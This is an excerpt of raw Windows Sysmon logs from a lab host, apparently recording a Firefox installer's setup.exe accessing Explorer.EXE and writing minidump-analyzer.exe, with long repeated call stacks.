Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\minidump-analyzer.exe2021-01-18 13:59:52.411 10341000x800000000000000015037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 